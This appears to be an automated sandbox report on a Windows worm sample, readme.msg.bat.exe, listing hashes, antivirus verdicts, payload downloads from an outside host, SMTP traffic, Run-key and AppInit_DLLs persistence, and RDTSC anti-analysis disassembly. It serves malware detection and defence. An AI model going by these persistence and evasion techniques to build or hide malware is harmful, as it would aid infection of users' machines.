Windows Analysis Report
readme.msg.bat.exe

Overview

General Information

Sample name: readme.msg.bat.exe
Analysis ID: 1579447
MD5: 99b66e501870ce033026d55dc5274ab0
SHA1: 57d7b4f8fc6feb18187a59fcbe01029419f25be3
SHA256: c0a793e1d786cc30e8e17ab97a0a614dfc6647033fea780d88dc4fea205c2674
Tags: exeuser-TeamDreier
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to inject threads in other processes
Creates an undocumented autostart registry key
Detected PE file pumping (to bypass AV & sandboxing)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: readme.msg.bat.exe Avira: detected
Source: C:\Windows\tserv.exe Avira: detection malicious, Label: WORM/Stration.C
Source: C:\Windows\tserv.exe ReversingLabs: Detection: 94%
Source: readme.msg.bat.exe Virustotal: Detection: 81% Perma Link
Source: readme.msg.bat.exe ReversingLabs: Detection: 94%
Source: Submited Sample Integrated Neural Analysis Model: Matched 84.2% probability
Source: C:\Windows\tserv.exe Joe Sandbox ML: detected
Source: readme.msg.bat.exe Joe Sandbox ML: detected
Source: readme.msg.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose, 0_2_00406360
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: Joe Sandbox View IP Address: 67.195.228.94 67.195.228.94
Source: Joe Sandbox View IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View IP Address: 67.195.228.109 67.195.228.109
Source: Network traffic Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.5:49715 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49715 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49707 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49765 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49765 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49874 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49874 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49820 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49820 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49879 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49879 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49769 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49928 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49824 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49934 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49934 -> 193.166.255.171:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49928 -> 193.166.255.171:80
Source: global traffic TCP traffic: 192.168.2.5:49713 -> 67.195.204.74:25
Source: global traffic TCP traffic: 192.168.2.5:49762 -> 67.195.228.94:25
Source: global traffic TCP traffic: 192.168.2.5:49814 -> 67.195.228.109:25
Source: global traffic TCP traffic: 192.168.2.5:49922 -> 142.250.141.26:25
Source: global traffic TCP traffic: 192.168.2.5:49971 -> 142.250.157.26:25
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic HTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global traffic DNS traffic detected: DNS query: yahoo.com
Source: global traffic DNS traffic detected: DNS query: www4.cedesunjerinkas.com
Source: global traffic DNS traffic detected: DNS query: mta6.am0.yahoodns.net
Source: global traffic DNS traffic detected: DNS query: mta7.am0.yahoodns.net
Source: global traffic DNS traffic detected: DNS query: mta5.am0.yahoodns.net
Source: global traffic DNS traffic detected: DNS query: gmail.com
Source: global traffic DNS traffic detected: DNS query: alt1.gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: alt2.gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: alt3.gmail-smtp-in.l.google.com
Source: global traffic DNS traffic detected: DNS query: alt4.gmail-smtp-in.l.google.com
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00423D83: QueryDosDeviceA,lstrcpyA,lstrcatA,GetLastError,lstrcpyA,lstrcatA,DefineDosDeviceA,GetLastError,lstrcpyA,lstrcatA,CreateFileA,DeviceIoControl,GetLastError,GetLastError,DefineDosDeviceA,GetLastError, 0_2_00423D83
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00411800 0_2_00411800
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004108D0 0_2_004108D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C8E0 0_2_0040C8E0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040F0E9 0_2_0040F0E9
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00410907 0_2_00410907
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00404110 0_2_00404110
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409119 0_2_00409119
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040F1C7 0_2_0040F1C7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C1D0 0_2_0040C1D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00404990 0_2_00404990
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004091A7 0_2_004091A7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040E246 0_2_0040E246
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00428A08 0_2_00428A08
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00425214 0_2_00425214
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00405310 0_2_00405310
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00408BC0 0_2_00408BC0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00415BD0 0_2_00415BD0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041B3D0 0_2_0041B3D0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040DBF0 0_2_0040DBF0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041E3A0 0_2_0041E3A0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409436 0_2_00409436
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409CF7 0_2_00409CF7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041BD00 0_2_0041BD00
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040EDE0 0_2_0040EDE0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040DE56 0_2_0040DE56
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041C660 0_2_0041C660
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00410670 0_2_00410670
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040E676 0_2_0040E676
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00409F47 0_2_00409F47
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040EF78 0_2_0040EF78
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040FF30 0_2_0040FF30
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00405F30 0_2_00405F30
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: String function: 0042664C appears 45 times
Source: readme.msg.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.evad.winEXE@6/3@11/7
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004047A0 lstrcatA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, 0_2_004047A0
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00405090 GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcatA,GetFileAttributesA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00405090
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041E0B0 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileA,WriteFile,CloseHandle, 0_2_0041E0B0
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Users\user\Desktop\A853.tmp Jump to behavior
Source: C:\Windows\tserv.exe Mutant created: NULL
Source: readme.msg.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\readme.msg.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: readme.msg.bat.exe Virustotal: Detection: 81%
Source: readme.msg.bat.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\Desktop\readme.msg.bat.exe File read: C:\Users\user\Desktop\readme.msg.bat.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\readme.msg.bat.exe "C:\Users\user\Desktop\readme.msg.bat.exe"
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\tserv.exe C:\Windows\tserv.exe s
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\A853.tmp
Source: unknown Process created: C:\Windows\tserv.exe "C:\Windows\tserv.exe" s
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\tserv.exe C:\Windows\tserv.exe s Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\A853.tmp Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: efswrt.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: cmut449c14b7.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\tserv.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041F660 LoadLibraryA,GetProcAddress,SetWindowsHookExA, 0_2_0041F660
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0042647C push eax; ret 0_2_0042649A
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004254B0 push eax; ret 0_2_004254C4
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_004254B0 push eax; ret 0_2_004254EC
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00426687 push ecx; ret 0_2_00426697

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\readme.msg.bat.exe Executable created and started: C:\Windows\tserv.exe Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe Jump to dropped file
Source: C:\Users\user\Desktop\readme.msg.bat.exe File created: C:\Windows\tserv.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\tserv.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs Jump to behavior
Source: C:\Windows\tserv.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run tserv Jump to behavior
Source: C:\Windows\tserv.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run tserv Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0041D159 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_0041D159

Malware Analysis System Evasion

barindex
Source: readme.msg.bat.exe Static PE information: Resource name: RT_ICON size: 0xffffff28
Source: C:\Users\user\Desktop\readme.msg.bat.exe RDTSC instruction interceptor: First address: 40C1E0 second address: 40C1EE instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+04h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [7598188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007EFDC919F7D5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+08h], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\readme.msg.bat.exe RDTSC instruction interceptor: First address: 40C1EE second address: 40C1FC instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+08h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [7598188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007EFDC8D9B375h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+0Ch], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\readme.msg.bat.exe RDTSC instruction interceptor: First address: 40C1FC second address: 40C20A instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+0Ch], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [7598188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007EFDC919F7D5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+10h], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_0040C1D0 rdtsc 0_2_0040C1D0
Source: C:\Windows\tserv.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Windows\tserv.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Users\user\Desktop\readme.msg.bat.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\readme.msg.bat.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\tserv.exe TID: 616 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\tserv.exe TID: 6676 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\tserv.exe Last function: Thread delayed
Source: C:\Windows\tserv.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose, 0_2_00406360
Source: C:\Users\user\Desktop\readme.msg.bat.exe Code function: 0_2_00429F44 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect, 0_2_00429F44
Source: C:\Windows\tserv.exe Thread delayed: delay time: 300000 Jump to behavior
Source: C:\Windows\tserv.exe Thread delayed: delay time: 300000 Jump to behavior
